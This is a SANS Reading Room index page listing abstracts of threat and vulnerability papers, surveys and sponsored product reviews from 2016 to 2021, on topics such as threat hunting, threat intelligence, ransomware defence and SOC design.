Sorry! The requested paper could not be found.
Threats/Vulnerabilities
Featuring 151 Papers as of January 20, 2021
-
Continuous Security Validation Against an Ever-Changing Landscape Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - January 20, 2021- Associated Webcasts: Continuous Security Validation Against an Ever-Changing Landscape
- Sponsored By: Cymulate
Waiting for an attack to test your security controls is not acceptable In this SANS product review, Matt Bromiley examines Cymulate Continuous Security Validation, a highly integrated, customizable platform built around testing the security controls of your organization. Bromiley puts this platform to the test in terms of its ability to identify security risks, craft purple team assessments, pivot from intelligence reports to control testing, gain executive-level insight into assessments, and more.
-
SANS 2020 Threat Hunting Survey Results Analyst Paper (requires membership in SANS.org community)
by Mathias Fuchs and Joshua Lemon - December 13, 2020- Associated Webcasts: SANS 2020 Threat Hunting Survey Results SANS 2020 Threat Hunting Survey: A Panel Discussion
- Sponsored By: Cisco Systems Sophos Inc. Infoblox Anomali DomainTools ThreatQuotient Corelight Swimlane Analyst1 BlackBerry Secureworks
According to past SANS surveys, many organizations aren't hunting for threats before they become incidents. This year's SANS Threat Hunting Survey looks at why that is and how security departments can reap the benefits of proactive hunting. For example: How do hunters conduct their searches for signs of a threat not yet detected by other security systems? Are they regularly checking on known threats targeting misconfigurations and other vulnerabilities? Do they find value in looking for totally unknown attack types?
-
20/20 Vision for Implementing a Security Operations Center Analyst Paper (requires membership in SANS.org community)
by Christopher Crowley - November 18, 2020- Associated Webcasts: 20/20 Vision for Implementing a Security Operations Center A SANS Whitepaper
- Sponsored By: Splunk CrowdStrike, Inc. Vectra Networks Inc.
Organizations want to transform the Security Operations Center (SOC) with automation and orchestration. Threat intelligence needs to be ingested, defense expenditures need to be optimized based on attacker tactics and techniques, new technology needs to be implemented, cloud resources and other external resources are taking the place of traditional on-premises systems, and skilled staff are scarce. To accomplish this modernization in stream with existing operations, a clear strategy for the capabilities and implementation is needed. How will you develop this strategic vision? Most organizations will look to the industry standards and reference implementations to determine a strategy before proceeding. This paper and webcast will help you explore what those models are. It will identify and discuss several models of what a SOC is. The relative merits and shortcomings will be identified, and value propositions will be offered. Your strategic outlook and your implementation will be substantially improved as a result.
-
Ransomware Prevention Special Report: How to Address a Pervasive and Unrelenting Threat Analyst Paper (requires membership in SANS.org community)
by Justin Henderson - November 17, 2020- Associated Webcasts: Ransomware Prevention Special Report: How to Address a Pervasive and Unrelenting Threat Ransomware Prevention Panel Discussion: How to Address a Pervasive and Unrelenting Threat
- Sponsored By: Cisco Systems LogRhythm Gigamon ExtraHop BlackBerry Cyberinc
Ransomware is a fast-growing threat affecting thousands of government agencies and municipalities, and now it is even targeting itself toward halting critical ICS/SCADA operations. This paper explains why and how ransomware is spreading, introduces standards and provide guidance for detecting and recovering from ransomware, based on US-CERT and NIST resources.
-
SANS Vulnerability Management Survey 2020 Analyst Paper (requires membership in SANS.org community)
by David Hazar - November 9, 2020- Associated Webcasts: SANS 2020 Vulnerability Management Survey SANS 2020 Vulnerability Management Survey: A Panel Discussion
- Sponsored By: Qualys Cisco Systems Inc. Anomali ThreatConnect
The 2020 Vulnerability Management Survey focused on how organizations vulnerability programs are evolving and maturing in response to changing technology, architecture and design. It also explored how organizations are identifying vulnerabilities in their applications and non-traditional infrastructure. Download this paper to learn who is responsible for treating or remediating discovered vulnerabilities, and how mature survey respondents feel they are at managing different types of vulnerabilities within different technology components, services and even third-parties or partners.
-
Threat Intelligence Solutions: A SANS Review of Anomali ThreatStream Analyst Paper (requires membership in SANS.org community)
by TJ Banasik - November 2, 2020- Associated Webcasts: Threat Intelligence Solutions: A SANS Review of Anomali ThreatStream
- Sponsored By: Anomali
Cyber threat data from multiple sources overwhelm todays Security Operations Centers (SOCs) without a centralized method to aggregate it. Many organizations have immature threat intelligence programs that rely on select external threat feeds, which users struggle to analyze. A cyber threat intelligence program requires people, processes, and technology to process, exploit, and disseminate threat data. In this product review, SANS had the opportunity to review the Anomali ThreatStream® product, a threat intelligence platform providing a unified solution for collecting, curating, and disseminating threat intelligence. ThreatStream rationalizes multiple threat data sources into a single high-fidelity repository by automatically normalizing, de-duplicating, removing false positives, and enriching the threat data, then associating all related threat indicators. ThreatStream applies a highly accurate machine learning algorithm for scoring indicators of compromise (IOCs).
-
Detecting Malicious Activity in Large Enterprises Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - September 8, 2020- Associated Webcasts: Detecting Malicious Activity in Large Enterprises
- Sponsored By: Chronicle
As they grow, organizations need to detect threats amid an alarming assortment of unexpected and complex conditions, often with a blend of legacy and current technologies. This paper explores options for advanced threat detections at enterprise scale.
-
Intuitive Endpoint Security: A SANS Review of Morphisec Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - August 18, 2020- Associated Webcasts: Intuitive Endpoint Security: A SANS Review of Morphisec
- Sponsored By: Morphisec
Endpoint security can be a tricky topic for organizations. In many cases, security teams utilize endpoint security products that are bulky and cumbersome, barely effective and only make their jobs more difficult. Furthermore, many security products rely so heavily on detecting an incident after the fact that they hardly seem effective in preventing cyber incidents. This leaves the security team constantly chasing alerts through the network, rather than implementing preventative techniques. In this paper SANS instructor Matt Bromiley reviews the Morphisec platform, which reverses much of this approach. Morphisec is geared toward the prevention of malicious activity through the careful morphing of process memory.
-
Browser Isolation: A SANS Review of Cyberinc's Isla Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - July 28, 2020- Associated Webcasts: Browser Isolation: A SANS Review of Cyberinc\'s Isla
- Sponsored By: Cyberinc
The browser is an integral part of users' day-to-day activities, providing access to internal resources, sensitive data and third-party services. Via the use of webmail and malicious links, it is also an integral piece of the entry vector for attackers. In this product review, Matt Bromiley reviews Cyberinc's Isla, a browser isolation platform that addresses this common incident entry vector by getting in front of browser-borne threats and effectively rendering them harmless.
-
Measuring and Improving Cyber Defense Using the MITRE ATT&CK Framework Analyst Paper (requires membership in SANS.org community)
by John Hubbard - July 17, 2020- Associated Webcasts: Measuring and Improving Cyber Defense Using the MITRE ATT&CK® Framework Measuring and Improving Cyber Defense Using the MITRE ATT&CK® Framework: A SANS Panel Discussion Understanding and Leveraging the MITRE ATT&CK® Framework: A SANS Roundtable
- Sponsored By: Cisco Systems Inc. LogRhythm Infoblox Anomali Reversing Labs ThreatQuotient Swimlane Awake Security ExtraHop
Through the ATT&CK framework, MITRE has generated a gold mine of information about the most important tactics and techniques used by attackers and how the blue team can detect and prevent these actions. Blocking atomic attack indicators such as domain names and IP addresses might work in the short term, but understanding the higher-level tactics in ATT&CK helps the blue team identify and anticipate attacker activity at a higher level of abstraction. In this white paper, SANS author and dedicated blue team member John Hubbard explores how ATT&CK slows attackers down and gives defenders a fighting chance.
-
Making and Keeping Work-at-Home Operations Safe and Productive Analyst Paper (requires membership in SANS.org community)
by John Pescatore - July 8, 2020- Associated Webcasts: Making and Keeping Work at Home Operations Safe and Productive Insights on Remote Access Cybersecurity and Workplace Flexibility - A SANS Whitepaper
- Sponsored By: Infoblox Menlo Security Pulse Secure BlackBerry
Workforce mobility, endpoint security and data protection risks have amplified since the COVID-19 pandemic. Organizations have had to address a variety of remote worker challenges including security teams working from home (WFH). While secure remote access capacity and cloud usage for business continuity has accelerated, business are now realizing productivity and operational advantages -- projecting a shift towards increased remote workplace flexibility and permanence.
-
Responding to Incidents in Industrial Control Systems: Identifying Threats/Reactions and Developing the IR Process Analyst Paper (requires membership in SANS.org community)
by Don C. Weber - May 21, 2020- Associated Webcasts: Responding to Incidents in Industrial Control Systems (ICS): Identifying Threats, Reactions and Developing the IR Process
- Sponsored By: Honeywell International
Threats, attacks and incidents are not decreasing. Industrial control systems (ICS) have become increasingly vulnerable as cyber criminals discover that OT environments are viable targets. This paper outlines the incident response process in OT environments, and provide examples of the pitfalls of being unprepared.
-
All Roads Lead to the Browser: A SANS Buyer's Guide to Browser Isolation Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - May 6, 2020- Associated Webcasts: All Roads Lead to the Browser: A SANS Buyer\'s Guide to Browser Isolation
- Sponsored By: Cyberinc
As organizations move to the cloud, browser dependency becomes more prevalent. That's why we say the browser is the new endpoint. By limiting the impact a browser can have on a victim system, organizations can prevent web code from reaching the endpoint. Find out how browser isolation works, key factors to consider when evaluating, implementing and testing solutions, and how to integrate browser isolation into your security posture to stop attacks earlier.
-
SANS Top New Attacks and Threat Report Analyst Paper (requires membership in SANS.org community)
by John Pescatore - April 27, 2020- Associated Webcasts: SANS Top New Attacks and Threat Report
- Sponsored By: Cisco Systems RSA Unisys Infoblox Anomali DomainTools Verodin Cyberinc
SANS instructors presented their analysis of new attack techniques currently in use and shared their projections for future exploits at the annual 2020 RSA Conference in San Francisco. In this paper, SANS Director of Emerging Security Trends John Pescatore highlights key themes from that report and other sources.
-
2020 SANS Cyber Threat Intelligence (CTI) Survey Analyst Paper (requires membership in SANS.org community)
by Robert M. Lee - February 10, 2020- Associated Webcasts: 2020 SANS Cyber Threat Intelligence (CTI) Survey Results 2020 SANS Cyber Threat Intelligence (CTI) Survey Panel Discussion 2020 SANS Cyber Threat Intelligence (CTI) Survey Results 2020 SANS Cyber Threat Intelligence (CTI) Survey Results 2020 SANS Cyber Threat Intelligence (CTI) Survey Panel Discussion
- Sponsored By: Sophos Inc. Infoblox Anomali DomainTools RecordedFuture ThreatConnect ThreatQuotient EclecticIQ
Over the past several years, SANS has seen a gradual maturation of cyber threat intelligence (CTI) and its applications in information security. This paper, based on results from the 2020 SANS CTI Survey, provides guidance on how organizations of all types can get the most out of CTI.
-
Protecting the User: A Review of Mimecast's Web Security Service Analyst Paper (requires membership in SANS.org community)
by David Szili - December 11, 2019- Associated Webcasts: Protecting the User: A Review of Mimecast’s Web Security Service Protecting the User: A Review of Mimecast’s Web Security Service
- Sponsored By: Mimecast Services Limited
The web remains a primary vector for cyberattacks, as either the initiation point or the way to complete the adversaries' mission. In this review, SANS instructor David Szili shares his perspectives on best practices for securing the web in general and his experience using the Mimecast Web Security cloud service in particular.
-
Exploring the Human Fingerprints on Malware by Tobias Johansson and Robert M. Lee - November 22, 2019
- Associated Webcasts: Human Fingerprints in Malware and their Use in Cyber Threat Intelligence
Much of the focus of cyber threat intelligence is countering adversaries and the tools and capabilities they leverage to do target organizations harm. Malware is a popular choice by many adversaries to fulfill their goals such as access development or destructive purposes. Malware contains a wealth of information to analyze for the purpose of cyber threat intelligence. The development, operationalizing, and utilization of malware is performed by humans and these human interactions leave traces of how the malware is leveraged, its configuration data, or even the choice of the malware itself. Malware is often not unique to specific adversaries but these traces, identified in the paper simply as human fingerprints, can be useful in clustering intrusions into sets for structured analysis and satisfying intelligence requirements. This is not a new concept and there are many researchers who take advantage of these practices today. The purpose of this paper is to introduce this concept to a wider audience and also structure it around the Diamond Model as a useful tool for analysis.
-
What Security Practitioners Really Do When It Comes to Security Testing Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - October 18, 2019- Associated Webcasts: Are Your Security Controls Yesterday\'s News?
- Sponsored By: Cymulate
Given the number, criticality and potential damage of attacks, how can you better protect your organization against the latest threats? And with so many solutions in your arsenal, how can you ensure that security controls are integrated seamlessly to defend you in the moment of truth against attacks? This paper, which is a follow-up to "Are Your Security Controls Yesterday’s News?," addresses issues with security effectiveness testing and how to improve control validation to shorten testing cycles, accelerate remediation and improve your organization's security posture--faster. It presents the results of a recent SANS poll to provide insight into how organizations are testing for security effectiveness and how performance is actually being measured. The paper also provides specific steps to help you optimize security in a more proactive, continuous way.
-
ExtraHop Reveal(x) Expands Attack Investigations to Cover All Vectors Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - September 30, 2019- Associated Webcasts: ExtraHop Reveal(x) Expands Attack Investigations to Cover All Vectors
- Sponsored By: ExtraHop
-
Effectively Addressing Advanced Threats Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - August 19, 2019- Sponsored By: IBM Security
As security professionals well know, the wave of advanced threats never stops, and organizations are increasingly challenged in dealing with the onslaught. But not all threats are created equal. How do you identify the most critical and deal with those? In this survey, we asked the security community to share what advanced threats their organizations are facing and how they're allocating resources and technology.
Register now for the associated webcast at 1 p.m. Eastern on Wednesday September 25, 2019: https://register.gotowebinar.com/register/6150616769136423937
-
Are Your Security Controls Yesterday's News? Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - July 18, 2019- Associated Webcasts: Are Your Security Controls Yesterday\'s News?
- Sponsored By: Cymulate
This spotlight paper, one of a two-part series, looks at just how successful an organization can expect to be if it's using old news, limited scope or "cookie-cutter" vulnerability scans as a way to assess its environment. SANS believes security control testing needs to improve significantly to emulate actual--not hypothetical--threats to an organization.
The second spotlight, "What Security Practitioners Really Do When It Comes to Security Testing," focuses on the input SANS received from a poll that gathered opinions from the SANS community on this topic
-
How to Protect a Modern Web Application in AWS Analyst Paper (requires membership in SANS.org community)
by Shaun McCullough - May 9, 2019- Sponsored By: AWS Marketplace
In moving assets to the cloud, organizations need to prioritize their security plans based on the risks to which they are exposed. With threat modeling, organizations can identify and prioritize the risks to infrastructure, applications and the services they provide, as well as evaluate how to manage those risks over time. This paper includes use cases for threat modeling web apps and the DevSecOps platform, using a process that is both repeatable and improvable.
-
Why Your Vulnerability Management Strategy Is Not Working - and What to Do About It Analyst Paper (requires membership in SANS.org community)
by Jake Williams - April 23, 2019- Associated Webcasts: Why Your Vulnerability Management Strategy Is Not Working – and What to Do About It
- Sponsored By: Lookingglass Cyber Solutions, Inc.
This paper looks at why vulnerability management solutions have not met expectations and how IT and security teams can better implement those solutions to maximize value. It also addresses how to deal with the resourcing constraints that all vulnerability management programs encounter.
-
SANS Top New Attacks and Threat Report Analyst Paper (requires membership in SANS.org community)
by John Pescatore - April 18, 2019- Associated Webcasts: SANS Top New Attacks and Threat Report
- Sponsored By: Unisys Infoblox Veracode Anomali DomainTools
Each year, the annual RSA Conference features top SANS instructors presenting their look at the new attack techniques currently in use and their projections for future exploits. This whitepaper captures highlights from this year's fast-paced and informative panel discussion, including insight into overall cybersecurity trends on both the offensive and defensive sides as well as advice from SANS on the steps enterprises must take to meet future risks.
-
SANS Vulnerability Management Survey Analyst Paper (requires membership in SANS.org community)
by Andrew Laman - April 8, 2019- Associated Webcasts: Current State of Vulnerability Management: Part 1 of the SANS Vulnerability Management Survey Results Vulnerability Practices of Tomorrow: Part 2 of the SANS Vulnerability Management Survey Results
- Sponsored By: Tenable Veracode Bromium Balbix
More and more organizations are finding that they need more than scanning results to manage their vulnerabilities effectively. This SANS survey investigates how organizations are managing vulnerabilities across their endpoints, applications, cloud services and business partners, while providing insights about survey results related to risk-based vulnerability management practices, management of cloud-based vulnerabilities and more.
-
Understanding the Adversary with Deception Technology Analyst Paper (requires membership in SANS.org community)
by Matt Bromiley - February 26, 2019- Associated Webcasts: Improving Detection and Understanding the Adversary with Deception Technology
- Sponsored By: TrapX Security
Organizations are having great difficulties properly remediating incidents and eradicating attackers from their environment. This paper examines some of the challenges facing organizations in understanding the adversary, and presents some of the latest deception techniques that can be used to identify attacker activity (both known and unknown).
-
Cyber Threats to the Bioengineering Supply Chain SANS.edu Graduate Student Research
by Scott Nawrocki - February 12, 2019Biotechnology and pharmaceutical companies rely on the sequencing of DNA to conduct research, develop new drug therapies, solve environmental challenges and study emerging infectious diseases. Synthetic biology combines biology and computer engineering disciplines to read, synthetically write and store DNA sequences utilizing bioinformatics applications. Bioengineers begin with a computerized genetic model and turn that model into a living cell (2011, Smolke). Genetic editing is making headlines as there are rumors that a genetically modified human, immune to HIV, was born in China. As the soil on our farms becomes depleted of nitrogen, genetic research is focusing on applications as a means to reintroduce nitrogen into the ground. Reliance on oil and pollution has paved the way for research into bio-fuels. Genomic research advances have outpaced the security of these applications and technology which leaves them vulnerable to attack (2017, Ney). As information security professionals, we must keep pace with these advances. This research will demonstrate the stages of a network-based attack, recommend Critical Security Controls countermeasures and introduce the concept of a Bioengineering Systems Kill Chain.
-
The Evolution of Cyber Threat Intelligence (CTI): 2019 SANS CTI Survey Analyst Paper (requires membership in SANS.org community)
by Rebekah Brown and Robert M. Lee - February 4, 2019- Associated Webcasts: CTI Requirements and Inhibitors: Part 1 of the 2019 SANS Cyber Threat Intelligence Survey CTI Tools, Usage and a Look Ahead: Part 2 of the 2019 SANS Cyber Threat Intelligence Survey
- Sponsored By: Anomali DomainTools RecordedFuture ThreatQuotient IntSights
In order to use cyber threat intelligence (CTI) effectively, organizations must know what intelligence to apply and where to get that intelligence. This paper delves into the results of the SANS 2019 Cyber Threat Intelligence Survey and explores the value of CTI, CTI requirements, how respondents are currently using CTI--and what the future holds.
-
Template Injection Attacks - Bypassing Security Controls by Living off the Land by Brian Wiltse - February 1, 2019
As adversary tactics continue to adapt and embrace the concept of living off the land by using legitimate company software instead of a virus or other malwareRut15, their tactics techniques and procedures (TTPs) often leverage programs and features in target environments that are normal and expected. The adversaries leverage these features in a way that enables them to bypass security controls to complete their objective. In May of 2017, a suspected APT group began to leverage one such feature in Microsoft Office, utilizing a Template Injection attack to harvest credentials, or gain access to end users computers at a US power plant operator, Wolf Creek Nuclear Operating Corp. In this Gold Paper, we will review in detail what the Template Injection attacks may have looked like against this target, and assess their ability to bypass security controls.
-
An Evaluator's Guide to NextGen SIEM Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - December 6, 2018- Associated Webcasts: An Evaluator\'s Guide to Next-Generation SIEM
- Sponsored By: LogRhythm
A traditional SIEM often lacks the capability to produce actionable information and has a limited shelf life. To be effective, a SIEM must stay relevant in the face of new threats and changes in an organizations technical and support infrastructures. Learn about the key questions to ask as you research adding a next-generation SIEM, one that captures data and generates information that security teams can use as intelligence to detect potentially malicious activity.
-
Integrating Threat Intelligence into Endpoint Security: A Review of CrowdStrike Falcon X Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - November 26, 2018- Associated Webcasts: Threat Intelligence and Protecting Your Endpoints: A SANS Review of the CrowdStrike Falcon X Platform
- Sponsored By: CrowdStrike, Inc.
While threat intelligence can transform an organization's security posture, it can be complex and costly for organizations to adopt and operationalize. With that in mind, SANS Analyst Dave Shackleford tested CrowdStrike Falcon X, which purportedly enables cybersecurity teams to automatically analyze malware found on endpoints, find related threats and enrich the results with customized threat intelligence. This review encapsulates his findings, and details how the solution can help SOC teams.
-
Automating Open Source Security: A SANS Review of WhiteSource Analyst Paper (requires membership in SANS.org community)
by Serge Borso - September 25, 2018- Associated Webcasts: Automating Open Source Security: A SANS Review of WhiteSource
- Sponsored By: WhiteSource
This paper takes a close look at how the WhiteSource solution can handle the myriad of open source vulnerabilities through real-time detection and remediation.
-
SANS 2018 Threat Hunting Survey Results Analyst Paper (requires membership in SANS.org community)
by Robert M. Lee and Rob T. Lee - September 18, 2018- Associated Webcasts: Threat Hunting Is a Process, Not a Thing: SANS 2018 Survey Results, Part I Threat Hunting in Action: SANS 2018 Survey Results, Part II
- Sponsored By: Qualys IBM RiskIQ Anomali DomainTools Malwarebytes
Our third survey on threat hunting looks at the maturity of hunting programs and where they are going, along with best practices being used in organizations to detect and remediate threats that would otherwise remain hidden. Read this report to learn how survey respondents answered questions that are immediately important to organizations conducting threat hunting.
-
A Guide to Managing Cloud Security Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - July 25, 2018- Associated Webcasts: Managing Cloud Security
- Sponsored By: Tenable
While many of the core concepts of vulnerability and threat management remain the same in the world of cloud deployments, we need to adapt our thinking to operate in a hybrid or public cloud deployment model. This paper will help you evaluate cloud vulnerabilities and threat management, and protect your data and assets in a dynamic cloud infrastructure.
-
Methods for the Controlled Deployment and Operation of a Virtual Patching Program SANS.edu Graduate Student Research
by William Vink - May 20, 2018In today’s rapidly changing IT environments, new vulnerabilities are identified at an increasing pace and attackers are becoming more sophisticated in their ability to exploit these vulnerabilities. At the same time, systems have become more complex and are still used in conjunction with older technologies which results in challenges in testing and deploying traditional patches.
-
10 Endpoint Security Problems Solved by the Cloud Analyst Paper (requires membership in SANS.org community)
by Deb Radcliff - May 4, 2018- Sponsored By: Carbon Black
SANS surveys and testimonials from IT and security professionals indicate that endpoint security is a challenge. There is too much complexity and cost, defenses aren't keeping up, and security staff is stretched thin. This infographic explores how cloud can help address these issues.
-
Managing User Risk: A Review of LogRhythm CloudAI for User and Entity Behavior Analytics Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 26, 2018- Associated Webcasts: Why Insider Actions Matter: SANS Review of LogRhythm CloudAI for User and Entity Behavior Analytics
- Sponsored By: LogRhythm
In this product review, we explored the recently released LogRhythm CloudAI, which applies user and entity behaviour analytics (UEBA) capabilities to enhance traditional event management and security analytics toolsets to monitor behaviors tracked over time, alerting analysts to unusual events or patterns of events.
-
CTI in Security Operations: SANS 2018 Cyber Threat Intelligence Survey Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 5, 2018- Associated Webcasts: Cyber Threat Intelligence Today: SANS CTI Survey Results, Part 1 Cyber Threat Intelligence Skills and Usefulness: SANS CTI Survey Results, Part 2
- Sponsored By: Rapid7 Inc. Anomali DomainTools ThreatConnect IntSights
The survey focuses on how organizations could collect security intelligence data from a variety of sources, and then recognize and act upon indicators of attack and compromise scenarios in a timely manner. Although some CTI trends continued this year, we definitely saw several differences in a number of areas, which are noted in the research. From this year's results, it is obvious that CTI collection, integration and use within security teams are maturing.
-
SOC Automation-Deliverance or Disaster Analyst Paper (requires membership in SANS.org community)
by Eric Cole, PhD - December 11, 2017- Sponsored By: DFLabs
Learn how to strike a balance between security alerts that can be automated with minimal impact and the higher-risk alerts that need to be handled by analysts.
-
Security and Operations - An Overlooked But Necessary Partnership Analyst Paper (requires membership in SANS.org community)
by Sonny Sarai - December 4, 2017- Associated Webcasts: Security and Ops Hacks
- Sponsored By: Rapid7 Inc.
This paper explores ways to foster cooperation between Security and Operations groups for better visibility into threats and threat pathways, while improving overall protection and network hygiene.
-
Blueprint for CIS Control Application: Securing the Oracle E-Business Suite Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - October 26, 2017- Sponsored By: Onapsis
This paper looks at how the Critical Security Controls can be used to secure Oracle's E-Business Suite (EBS), using an approach that considers application- as well as network-related issues.
-
Targeted Attack Protection: A Review of Endgame’s Endpoint Security Platform Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - October 17, 2017- Associated Webcasts: Targeted Attack Protection: SANS Review of Endgame\'s endpoint security platform
- Sponsored By: Endgame
SANS Analyst Dave Shackleford presents his experience reviewing Endgame's Managed Detection and Response Services under real-world threats in a simulated environment.
-
Sensitive Data at Risk: The SANS 2017 Data Protection Survey Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - September 5, 2017- Associated Webcasts: Sensitive Data Everywhere: Results of SANS 2017 Data Protection Survey
- Sponsored By: Mcafee LLC Infoblox
Ransomware, insider threat and denial of service are considered the top threats to sensitive data by respondents to the 2017 SANS Data Protection Survey. User credentials and privileged accounts represented the most common data types involved in these breaches reported in the survey, spotlighting the fact that access data is prized by attackers. The experiences of respondents with compromised data provide valuable lessons for security professionals.
-
2017 Threat Landscape Survey: Users on the Front Line Analyst Paper (requires membership in SANS.org community)
by Lee Neely - August 14, 2017- Associated Webcasts: Security Whack-a-Mole: SANS 2017 Threat Landscape Survey Security Whack-a-Mole: SANS 2017 Threat Landscape Survey
- Sponsored By: Qualys Mcafee LLC FireEye Cylance
Endpoints-and the users behind them-are on the front lines of the battle: Together they represent the most significant entry points for attackers obtaining a toehold into the corporate network. Users are also the best detection tool organizations have against real threats, according to the 2017 SANS Threat Landscape survey. Read on for more detail on the types of attacks occurring and their impact on organizations and their security.
-
Road Map to a Secure, Smart Infrastructure Analyst Paper (requires membership in SANS.org community)
by Barbara Filkins - August 9, 2017- Associated Webcasts: Roadmap to a Secure Smart Infrastructure
- Sponsored By: Rapid7 Inc.
This paper provides a multifaceted security approach for securing infrastructure systems that are being targeted by attackers and malware.
-
Defending Against the Wrong Enemy: 2017 SANS Insider Threat Survey Analyst Paper (requires membership in SANS.org community)
by Eric Cole - July 31, 2017- Associated Webcasts: The SANS 2017 Insider Threat Survey: Mounting an Effective Defense Against Insider Threat The SANS 2017 Insider Threat Survey: Mounting an Effective Defense Against Insider Threat
- Sponsored By: Rapid7 Inc. Dtex Systems Haystax Technology
It is easy, while evaluating attack vectors, researching competitors and gauging the threat from organized crime or foreign adversaries, to conclude that external attacks should be the primary focus of defense. This conclusion would be wrong. The critical element is not the source of a threat, but its potential for damage. This survey highlights the importance of managing internal threats as the key to winning at cyber security.
-
Hacking the CAN Bus: Basic Manipulation of a Modern Automobile Through CAN Bus Reverse Engineering SANS.edu Graduate Student Research
by Roderick Currie - June 20, 2017The modern automobile is an increasingly complex network of computer systems. Cars are no longer analog, mechanical contraptions. Today, even the most fundamental vehicular functions have become computerized. And at the core of this complexity is the Controller Area Network, or CAN bus. The CAN bus is a modern vehicle's central nervous system upon which the majority of intra-vehicular communication takes place. Unfortunately, the CAN bus is also inherently insecure. Designed more than 30 years ago, the CAN bus fails to implement even the most basic security principles. Prior scholarly research has demonstrated that an attacker can gain remote access to a vehicle's CAN bus with relative ease. This paper, therefore, seeks to examine how an attacker already inside a vehicle's network could manipulate the vehicle by reverse engineering CAN bus communications. By providing a reproducible methodology for CAN bus reverse engineering, this paper also serves as a basic guide for penetration testers and automotive security researchers. The techniques described in this paper can be used by security researchers to uncover vulnerabilities in existing automotive architectures, thereby encouraging automakers to produce more secure systems going forward.
-
Speed and Scalability Matter: Review of LogRhythm 7 SIEM and Analytics Platform Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - April 13, 2017- Associated Webcasts: Speed and Scalability Matter: SANS Review of LogRhythm 7 SIEM and Analytics Platform
Just how scalable, fast and accurate are SIEM tools when under load? To find out, we put the LogRhythm 7.2 Threat Lifecycle Management Platform to the test. We found that its clustered Elasticsearch indexing layer supported large log volumes of security and event data during simulated events that would require investigation and remediation.
-
Cyber Threat Intelligence Uses, Successes and Failures: The SANS 2017 CTI Survey Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - March 14, 2017- Associated Webcasts: Cyber Threat Intelligence in Action-Skills and Implementations: Results of the 2017 Cyber Threat Intelligence Survey Part 1 Cyber Threat Intelligence in Action-Effectiveness of CTI Programs and Wish Lists for the Future: Results of the 2017 Cyber Threat Intelligence Survey Part 2
- Sponsored By: Arbor Networks Rapid7 Inc. Lookingglass Cyber Solutions, Inc. Anomali DomainTools ThreatConnect
Respondents' biggest challenges to effective implementation of cyber threat intelligence (CTI) are lack of trained staff, funding, time to implement new processes, and technical capability to integrate CTI, as well as limited management support. Those challenges indicate a need for more training and easier, more intuitive tools and processes to support the use of CTI in today's networks. These and other trends and best practices are covered in this report.
-
DevSecOps Transformation: The New DNA of Agile Business Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 21, 2017This is an additional resource that accompanies the analyst paper, "The DevSecOps Approach to Securing Your Code and Your Cloud". To view the paper please click this link.
-
PLC Device Security - Tailoring needs by Wen Chinn Yew - February 15, 2017
Programmable Logic Controller (PLC) is widely used in many industries. With increasing concern and interest in the security of these controllers and their impact to the industries, there is a growing trend to integrate security directly into them. It is not realistic or wise to have a one size fit all solution. This paper presents focus areas and requirements suited for various classes of PLCs in the market. It looks at the threats and vulnerabilities faced by them and current security solutions adopted. The paper then recommends how PLC vendors should have different but extensible security solutions applied across various classes of controllers in their product portfolio.
-
The DevSecOps Approach to Securing Your Code and Your Cloud Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - February 7, 2017- Sponsored By: CloudPassage
DevSecOps, at heart, is about collaboration. More specifically, it is continual collaboration between information security, application development and IT operations teams. Having all three teams immersed in all development and deployment activities makes it easier for information security teams to integrate controls into the deployment pipeline without causing delays or creating issues by implementing security controls after systems are already running. Despite the potential benefits, getting started with DevSecOps will likely require some cultural changes and considerable planning, especially when automating the configuration and security of assets in the cloud. To help the shift toward a more collaborative culture, security teams need to integrate with the developers who are promoting code to cloud-based applications to show they can bring quality conditions to bear on any production code push without slowing the process. Security teams should also work with QA and development to define the key qualifiers and parameters that need to be met before any code can be promoted. This paper also has an additional resource titled, "DevSecOps Transformation: The New DNA of Agile Business". The resource can be accessed by clicking this link.
-
Insider Threats and the Need for Fast and Directed Response Analyst Paper (requires membership in SANS.org community)
by Dr. Eric Cole - December 1, 2016- Associated Webcasts: Insider Threats and the Real Financial Impact to Organizations - A SANS Survey
- Sponsored By: Veriato
As breaches continue to cause significant damage to organizations, security consciousness is shifting from traditional perimeter defense to a holistic understanding of what is causing the damage and where organizations are exposed. Although many attacks are from an external source, attacks from within often cause the most damage. This report looks at how and why insider attacks occur and their implications.
-
Taking Action Against the Insider Threat Analyst Paper (requires membership in SANS.org community)
by Eric Cole, PhD - October 5, 2016- Associated Webcasts: Taking Action Against Insider Threats Taking Action Against Insider Threats
- Sponsored By: Dtex Systems
Most organizations tend to focus on external threats, but insider threats are increasingly taking center stage. Insider threats come not only from the malicious insider, but also from infiltrators and unintentional insiders as well. Why are insider threats so common and why do they have such a significant impact? What is the difference between the different types of insider threats and the degree of risk they can constitute?
-
Intelligent Network Defense Analyst Paper (requires membership in SANS.org community)
by Jake Williams - September 8, 2016- Associated Webcasts: Intelligent Network Security
- Sponsored By: ThreatSTOP
When an army invades a sovereign nation, one of the defenders’ first goals is to disrupt the invader’s command and control (C2) operations. The same is true when cyber attackers invade your network. Network defenders must prevent adversary communication, stopping the attack in its tracks while alerting the incident response (IR) team to the point of compromise and nature of the attack. Read on to learn more.
-
Generating Hypotheses for Successful Threat Hunting Analyst Paper (requires membership in SANS.org community)
by Robert M. Lee and David Bianco - August 15, 2016Threat hunting is a proactive and iterative approach to detecting threats. Although threat hunters should rely heavily on automation and machine assistance, the process itself cannot be fully automated. One of the human’s key contributions to a hunt is the formulation of a hypotheses to guide the hunt. This paper explores three types of hypotheses and outlines how and when to formulate each of them.
-
